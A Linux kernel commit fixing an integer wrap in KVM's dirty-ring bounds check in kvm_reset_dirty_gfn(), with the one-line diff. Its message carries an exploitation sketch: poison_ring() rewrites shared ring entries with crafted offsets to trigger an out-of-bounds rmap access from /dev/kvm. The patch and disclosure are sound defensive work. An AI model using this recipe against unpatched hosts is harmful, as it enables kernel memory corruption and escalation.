Commit 577a8d3bae05 for kernel

commit 577a8d3bae0531f0e5ccfac919cd8192f920a804
Author: Aaron Sacks <contact@xchglabs.com>
Date:   Tue May 12 02:07:42 2026 -0400

    KVM: Reject wrapped offset in kvm_reset_dirty_gfn()

    kvm_reset_dirty_gfn() guards the gfn range with

            if (!memslot || (offset + __fls(mask)) >= memslot->npages)
                    return;

    but offset is u64 and the addition is unchecked.  The check can be
    silently bypassed by a u64 wrap.
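
    As a freestanding illustration of the wrap (plain userspace C, not
    kernel code; the constants mirror the crafted entries below):

            #include <stdint.h>
            #include <stdio.h>

            int main(void)
            {
                    uint64_t offset = 0xffffffffffffffc1ULL; /* ring payload  */
                    uint64_t npages = 512;                   /* any real slot */
                    unsigned int fls = 63;                   /* __fls(mask)   */

                    /* offset + fls wraps to 0; 0 >= 512 is false, so the
                     * guard falls through despite the wild offset. */
                    printf("rejected: %d\n", (offset + fls) >= npages);
                    return 0;
            }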

    The dirty ring backing those entries is MAP_SHARED at
    KVM_DIRTY_LOG_PAGE_OFFSET of the vcpu fd, so the VMM can rewrite the
    slot and offset fields of any entry between when the kernel pushes
    them and when KVM_RESET_DIRTY_RINGS consumes them.  On reset,
    kvm_dirty_ring_reset() re-reads the values via READ_ONCE() and feeds
    them straight back into this check; only the flags handshake is
    treated as the handover, while the slot/offset payload is taken on
    trust.
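
    A sketch of that window from the VMM side (vcpu_fd, ring_bytes and
    the ring index i are assumed to be set up elsewhere; the struct and
    constants come from <linux/kvm.h>):

            #include <linux/kvm.h>
            #include <sys/mman.h>
            #include <unistd.h>

            static void poison_ring(int vcpu_fd, size_t ring_bytes, int i)
            {
                    /* Map the vcpu's dirty ring, as any VMM does. */
                    struct kvm_dirty_gfn *ring =
                            mmap(NULL, ring_bytes, PROT_READ | PROT_WRITE,
                                 MAP_SHARED, vcpu_fd,
                                 KVM_DIRTY_LOG_PAGE_OFFSET * getpagesize());

                    /* After KVM pushes entries i and i+1, but before
                     * KVM_RESET_DIRTY_RINGS, rewrite the trusted payload... */
                    ring[i].offset     = 0xffffffffffffffc1ULL;
                    ring[i + 1].offset = 0;

                    /* ...and complete only the handshake KVM verifies. */
                    ring[i].flags     |= KVM_DIRTY_GFN_F_RESET;
                    ring[i + 1].flags |= KVM_DIRTY_GFN_F_RESET;
            }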

    Crafting two entries

            entry[i].offset   = 0xffffffffffffffc1
            entry[i+1].offset = 0

    makes the coalescing loop in kvm_dirty_ring_reset() compute

            delta = (s64)(0 - 0xffffffffffffffc1) = 63

    which falls in [0, BITS_PER_LONG), so it folds entry[i+1] into the
    existing mask by setting bit 63.  The trailing kvm_reset_dirty_gfn()
    call then sees offset = 0xffffffffffffffc1 and __fls(mask) = 63;
    the sum is 0 in u64 and the bounds check passes.
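
    For reference, the coalescing step has this shape (condensed, not
    verbatim):

            s64 delta = next_offset - cur_offset;
                            /* (s64)(0 - 0xffffffffffffffc1) == 63 */

            if (delta >= 0 && delta < BITS_PER_LONG) {
                    mask |= 1ull << delta;  /* sets bit 63           */
                    continue;               /* offset keeps 0xff..c1 */
            }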

    That offset propagates into kvm_arch_mmu_enable_log_dirty_pt_masked()
    unchanged.  On the legacy MMU path -- kvm_memslots_have_rmaps() ==
    true, i.e. shadow paging, any VM that has allocated shadow roots, or
    a write-tracked slot -- it reaches gfn_to_rmap(), which indexes
    slot->arch.rmap[0][] with a near-U64_MAX gfn.  That is an
    out-of-bounds load of a kvm_rmap_head, followed by a conditional
    clear of PT_WRITABLE_MASK in whatever the loaded pointer points at.
    The path is reachable from any process with access to /dev/kvm.
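
    On the 4K level gfn_to_index() reduces to a plain subtraction, so
    the failing lookup has this shape (condensed, not verbatim):

            idx = gfn - slot->base_gfn;       /* near-U64_MAX here      */
            return &slot->arch.rmap[0][idx];  /* OOB kvm_rmap_head load */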

    Range-check offset on its own first, so the addition cannot wrap.
    memslot->npages is bounded well below U64_MAX, so once offset <
    npages holds, offset + __fls(mask) (with __fls(mask) < BITS_PER_LONG)
    cannot wrap, and the existing comparison against npages is sound.
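
    Concretely, assuming the usual KVM_MEM_MAX_NR_PAGES bound of
    (1UL << 31) - 1 on slot sizes:

            offset               <  npages  <=  (1UL << 31) - 1
            offset + __fls(mask) <  npages + BITS_PER_LONG    /* no u64 wrap */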

    Fixes: fb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking")
    Cc: stable@vger.kernel.org
    Signed-off-by: Aaron Sacks <contact@xchglabs.com>
    Link: https://patch.msgid.link/20260512060742.1628959-1-contact@xchglabs.com/
    Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>

diff --git a/virt/kvm/dirty_ring.c b/virt/kvm/dirty_ring.c
index 02bc6b00d76c..572b854edf74 100644
--- a/virt/kvm/dirty_ring.c
+++ b/virt/kvm/dirty_ring.c
@@ -63,7 +63,8 @@ static void kvm_reset_dirty_gfn(struct kvm *kvm, u32 slot, u64 offset, u64 mask)

 	memslot = id_to_memslot(__kvm_memslots(kvm, as_id), id);

-	if (!memslot || (offset + __fls(mask)) >= memslot->npages)
+	if (!memslot || offset >= memslot->npages ||
+	    offset + __fls(mask) >= memslot->npages)
 		return;

 	KVM_MMU_LOCK(kvm);